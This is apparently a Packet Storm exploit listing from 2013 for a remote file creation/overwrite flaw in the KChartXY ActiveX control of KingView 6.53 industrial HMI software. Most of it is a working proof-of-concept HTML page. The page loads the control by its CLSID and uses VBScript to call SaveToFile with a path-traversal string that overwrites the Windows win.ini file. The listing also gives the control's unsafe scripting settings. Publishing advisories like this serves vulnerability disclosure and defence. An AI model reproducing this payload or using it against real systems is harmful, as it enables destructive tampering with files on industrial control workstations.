KingView 6.53 Active-X File Overwrite / Creation

2013-09-05T00:00:00
ID PACKETSTORM:123116
Type packetstorm
Reporter Blake
Modified 2013-09-05T00:00:00

Description

                                        
                                            `<!--  
KingView ActiveX Control (KChartXY) Remote File Creation / Overwrite  
Vendor: http://www.wellintech.com  
Version: KingView 6.53  
Tested on: Windows XP SP3 / IE  
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip  
Author: Blake  
  
CLSID: A9A2011A-1E02-4242-AAE0-B239A6F88BAC  
ProgId: KCHARTXYLib.KChartXY  
Path: C:\Program Files\KingView\KChartXY.ocx  
MemberName: SaveToFile  
Safe for scripting: False  
Safe for init: False  
Kill Bit: False  
IObject safety not implemented  
  
Description: Proof of concept overwrites the win.ini file  
-->  
<html>  
<object classid='clsid:A9A2011A-1E02-4242-AAE0-B239A6F88BAC' id='target' ></object>  
<script language='vbscript'>  
  
arg1="..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini"  
  
target.SaveToFile arg1  
  
</script>  
  
  
`